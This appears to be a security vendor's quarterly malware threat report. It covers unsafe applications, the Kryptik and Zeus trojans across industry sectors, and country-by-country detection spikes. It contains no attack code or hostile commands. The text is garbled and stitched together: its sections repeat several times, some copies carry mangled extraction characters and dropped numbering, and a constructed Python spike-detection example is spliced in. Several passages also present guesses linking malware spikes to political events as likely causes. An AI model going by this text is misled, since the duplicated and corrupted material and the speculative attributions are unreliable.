This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are second and third respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals,” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the top malware family for each vertical’s top malware type.
Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let’s examine “Zbot,” which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
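The spike-and-event correlation used throughout this section can be reproduced on any daily detection series an analyst holds. The following Python is an added example, not code or data from the report: it flags days whose count is at least ten times the median of the preceding two weeks (the "well over ten times the usual" baseline the North Korea paragraph describes), merges consecutive flagged days into one episode, and annotates each episode with nearby entries from an event calendar. All counts and event dates are constructed, not Comodo telemetry.

```python
from datetime import date, timedelta
from statistics import median

# Constructed daily detection counts for one country (NOT Comodo data):
# a flat baseline of roughly 10 detections/day starting on 2018-04-01,
# with a two-day surge on May 2-3 mimicking the "well over ten times
# the usual number of detections" pattern described for North Korea.
START = date(2018, 4, 1)
COUNTS = [12, 9, 14, 11, 10, 13, 8, 12, 11, 10,
          9, 13, 12, 10, 11, 14, 9, 10, 12, 11,
          10, 13, 11, 9, 12, 10, 11, 13, 10, 12,
          11, 150, 160, 12, 10]

# Constructed event calendar (hypothetical dates) used to annotate spikes.
EVENTS = {
    date(2018, 5, 2): "constructed event: brief period of wider Internet access",
    date(2018, 4, 10): "constructed event: unrelated holiday",
}


def detect_spikes(counts, start, window=14, ratio=10.0, floor=5):
    """Return (day, count, baseline) for each day whose count is at least
    `ratio` times the baseline, where the baseline is the median of the
    preceding `window` days. The median (not the mean) is used so that a
    spike already inside the window does not inflate the baseline and mask
    a second, later spike. `floor` guards against near-zero baselines that
    would make ordinary noise look like a surge."""
    spikes = []
    for i in range(window, len(counts)):
        baseline = max(median(counts[i - window:i]), floor)
        if counts[i] >= ratio * baseline:
            spikes.append((start + timedelta(days=i), counts[i], baseline))
    return spikes


def group_episodes(spikes):
    """Merge consecutive spike days into episodes so a multi-day surge is
    reported once, with its peak day and peak ratio to baseline."""
    episodes = []
    for day, count, baseline in spikes:
        if episodes and (day - episodes[-1]["end"]).days == 1:
            ep = episodes[-1]
            ep["end"] = day
            if count > ep["peak_count"]:
                ep.update(peak_day=day, peak_count=count,
                          peak_ratio=round(count / baseline, 1))
        else:
            episodes.append({"start": day, "end": day, "peak_day": day,
                             "peak_count": count,
                             "peak_ratio": round(count / baseline, 1)})
    return episodes


def annotate(episodes, events, tolerance_days=1):
    """Attach calendar entries falling within `tolerance_days` of an
    episode. This only surfaces candidate explanations: a matching date
    is a hypothesis to investigate, not a confirmed cause."""
    for ep in episodes:
        lo = ep["start"] - timedelta(days=tolerance_days)
        hi = ep["end"] + timedelta(days=tolerance_days)
        ep["events"] = sorted(f"{d.isoformat()}: {what}"
                              for d, what in events.items() if lo <= d <= hi)
    return episodes


if __name__ == "__main__":
    for ep in annotate(group_episodes(detect_spikes(COUNTS, START)), EVENTS):
        print(f"{ep['start']}..{ep['end']} peak {ep['peak_count']} "
              f"({ep['peak_ratio']}x baseline) events={ep['events']}")
```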
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
